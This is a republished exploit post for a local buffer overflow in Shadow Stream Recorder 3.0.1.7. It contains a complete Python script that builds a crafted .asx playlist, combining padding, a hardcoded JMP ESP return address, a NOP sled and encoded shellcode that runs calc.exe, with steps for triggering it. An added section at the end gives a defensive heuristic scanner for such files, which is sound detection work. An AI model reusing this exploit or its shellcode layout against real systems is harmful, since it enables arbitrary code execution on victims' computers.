Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
Source: vfocus.net  Author: b0telh0  Published: 2010-03-31

#!/usr/bin/python
#
# Title: Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
# Date: 03-29-2010
# Author: b0telh0
# Link: http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
# Tested on: Windows XP SP3


#
# windows/exec - 228 bytes
# EXITFUNC=seh, CMD=calc.exe
#

shellcode = ("\xda\xd6\xbe\xc4\x14\x6b\x17\x31\xc9\xd9\x74\x24\xf4\x58\xb1"
 "\x33\x83\xe8\xfc\x31\x70\x14\x03\x70\xd0\xf6\x9e\xeb\x30\x7f"
 "\x60\x14\xc0\xe0\xe8\xf1\xf1\x32\x8e\x72\xa3\x82\xc4\xd7\x4f"
 "\x68\x88\xc3\xc4\x1c\x05\xe3\x6d\xaa\x73\xca\x6e\x1a\xbc\x80"
 "\xac\x3c\x40\xdb\xe0\x9e\x79\x14\xf5\xdf\xbe\x49\xf5\xb2\x17"
 "\x05\xa7\x22\x13\x5b\x7b\x42\xf3\xd7\xc3\x3c\x76\x27\xb7\xf6"
 "\x79\x78\x67\x8c\x32\x60\x0c\xca\xe2\x91\xc1\x08\xde\xd8\x6e"
 "\xfa\x94\xda\xa6\x32\x54\xed\x86\x99\x6b\xc1\x0b\xe3\xac\xe6"
 "\xf3\x96\xc6\x14\x8e\xa0\x1c\x66\x54\x24\x81\xc0\x1f\x9e\x61"
 "\xf0\xcc\x79\xe1\xfe\xb9\x0e\xad\xe2\x3c\xc2\xc5\x1f\xb5\xe5"
 "\x09\x96\x8d\xc1\x8d\xf2\x56\x6b\x97\x5e\x39\x94\xc7\x07\xe6"
 "\x30\x83\xaa\xf3\x43\xce\xa0\x02\xc1\x74\x8d\x04\xd9\x76\xbe"
 "\x6c\xe8\xfd\x51\xeb\xf5\xd7\x15\x0d\x07\xea\x83\x99\xbe\x9f"
 "\xe9\xc4\x40\x4a\x2d\xf0\xc2\x7f\xce\x07\xda\xf5\xcb\x4c\x5c"
 "\xe5\xa1\xdd\x09\x09\x15\xde\x1b\x6a\xf8\x4c\xc7\x43\x9f\xf4"
 "\x62\x9c\x55");

junk = "\x41" * 26112
eip = "\x53\x93\x37\x7E"        # 7E379353  USER32.dll  (JMP ESP)
nops = "\x90" * 20
junk2 = "\x41" * 3636

try:
    file = open('b0t.asx','w');
    file.write(junk+eip+nops+shellcode+junk2);
    file.close();
    print "\n[+] b0t.asx created."
    print "[+] Open ssrecorder.exe..."
    print "[+] and drag and drop b0t.asx.\n"
except:
    print "\n[-] Error.. Can't write file to system.\n"
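
A defender-side triage check for the kind of file this script writes, as an added example that is not part of the original post: it flags a supposed .asx playlist that lacks the `<asx>` root element, contains a very long run of one repeated byte, or contains a run of 0x90 bytes. The thresholds `MAX_RUN` and `NOP_RUN`, the function names and both sample inputs are assumptions constructed for illustration.

```python
import re
import sys

# Assumed thresholds (not from the original page); tune against real playlists.
MAX_RUN = 512   # longest tolerated run of one repeated byte
NOP_RUN = 8     # consecutive 0x90 bytes treated as a NOP-sled indicator


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte value."""
    return max((m.end() - m.start()
                for m in re.finditer(rb"(.)\1*", data, re.DOTALL)), default=0)


def triage_asx(data: bytes) -> list:
    """Return reasons a supposed .asx playlist looks malformed ([] = nothing found)."""
    reasons = []
    # A real ASX playlist is XML-like text whose root element is <asx ...>.
    if not re.search(rb"<\s*asx\b", data[:1024], re.IGNORECASE):
        reasons.append("no <asx> root element in first 1 KiB")
    run = longest_run(data)
    if run > MAX_RUN:
        reasons.append("run of %d identical bytes" % run)
    if re.search(rb"\x90{%d,}" % NOP_RUN, data):
        reasons.append("run of 0x90 bytes")
    return reasons


# Constructed samples (not taken from any real file).
BENIGN = (b'<asx version="3.0">\n  <entry>\n    <title>Example</title>\n'
          b'    <ref href="http://example.com/stream.asf" />\n  </entry>\n</asx>\n')
# Same field lengths as the script above, with the address and payload
# replaced by zero bytes so the sample carries nothing executable.
PADDED = b"A" * 26112 + b"\x00" * 4 + b"\x90" * 20 + b"\x00" * 228 + b"A" * 3636

if __name__ == "__main__":
    # Usage: python triage_asx.py file1.asx file2.asx ...
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, triage_asx(fh.read()) or "ok")
```

These are heuristics for mail or download gateways and for incident triage; a clean result does not prove a file is safe to open in an unpatched player.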


 